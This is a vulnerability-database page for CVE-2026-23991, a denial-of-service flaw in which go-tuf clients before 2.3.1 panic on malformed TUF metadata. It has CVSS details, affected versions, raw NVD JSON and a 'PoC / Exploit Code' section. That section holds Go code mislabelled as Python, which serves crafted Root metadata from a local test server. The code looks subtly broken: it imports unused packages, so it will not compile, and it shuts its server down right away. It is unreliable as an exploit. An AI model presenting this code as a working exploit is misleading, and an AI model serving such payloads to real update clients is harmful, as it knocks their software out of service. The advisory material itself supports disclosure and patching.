Security Vulnerability Report
中文
CVE-2026-23991 CVSS 5.9 MEDIUM

CVE-2026-23991

Published: 2026-01-22 03:15:47
Last Modified: 2026-02-17 16:10:56
Source: [email protected]

Description

go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, if the TUF repository (or any of its mirrors) returns invalid TUF metadata JSON (valid JSON but not well formed TUF metadata), the client will panic during parsing, causing a denial of service. The panic happens before any signature is validated. This means that a compromised repository/mirror/cache can DoS clients without having access to any signing key. Version 2.3.1 fixes the issue. No known workarounds are available.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:* - VULNERABLE
go-tuf 2.0.0 <= version < 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-23991 PoC - Malformed TUF Metadata JSON causing DoS // This PoC demonstrates a malformed TUF metadata that triggers panic in go-tuf < 2.3.1 package main import ( "fmt" "io/ioutil" "net/http" "net/http/httptest" "github.com/theupdateframework/go-tuf/cmd/tuf" ) func main() { // Malformed TUF metadata that causes panic during parsing // This JSON is valid syntax but violates TUF metadata specification malformedMetadata := `{ "signed": { "_type": "Root", "spec_version": "1.0.0", "version": 1, "expires": "invalid-date-format", "keys": { "keyid": { "keytype": "ed25519", "keyval": { "public": null } } }, "roles": { "targets": { "keyids": ["keyid"], "threshold": -1 } }, "consistent_snapshot": "not-a-boolean" }, "signatures": [] }` // Create a malicious TUF server that serves malformed metadata server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.Header().Set("Content-Type", "application/json") fmt.Fprint(w, malformedMetadata) })) defer server.Close() fmt.Println("Malicious TUF server started at:", server.URL) fmt.Println("Serving malformed metadata to trigger DoS...") fmt.Println("Any client using go-tuf < 2.3.1 will panic when parsing this metadata") fmt.Println("\nMalformed metadata content:") fmt.Println(malformedMetadata) } // Note: To trigger the vulnerability, a TUF client would try to update // from this malicious server. The parser will panic before signature // verification due to invalid JSON structure per TUF specification.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23991", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.317", "lastModified": "2026-02-17T16:10:55.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, if the TUF repository (or any of its mirrors) returns invalid TUF metadata JSON (valid JSON but not well formed TUF metadata), the client will panic during parsing, causing a denial of service. The panic happens before any signature is validated. This means that a compromised repository/mirror/cache can DoS clients without having access to any signing key. Version 2.3.1 fixes the issue. No known workarounds are available."}, {"lang": "es", "value": "go-tuf es una implementación en Go de The Update Framework (TUF). A partir de la versión 2.0.0 y antes de la versión 2.3.1, si el repositorio TUF (o cualquiera de sus espejos) devuelve JSON de metadatos TUF no válido (JSON válido pero metadatos TUF no bien formados), el cliente entrará en pánico durante el análisis, causando una denegación de servicio. El pánico ocurre antes de que se valide cualquier firma. Esto significa que un repositorio/espejo/caché comprometido puede DoS a los clientes sin tener acceso a ninguna clave de firma. La versión 2.3.1 soluciona el problema. No hay soluciones alternativas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}, {"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.3.1", "matchCriteriaId": "6442E623-C25E-418E-A418-324F815885AF"}]}]}], "references": [{"url": "https://github.com/theupdateframework/go-tuf/commit/73345ab6b0eb7e59d525dac17a428f043074cef6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/theupdateframework/go-tuf/releases/tag/v2.3.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-846p-jg2w-w324", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.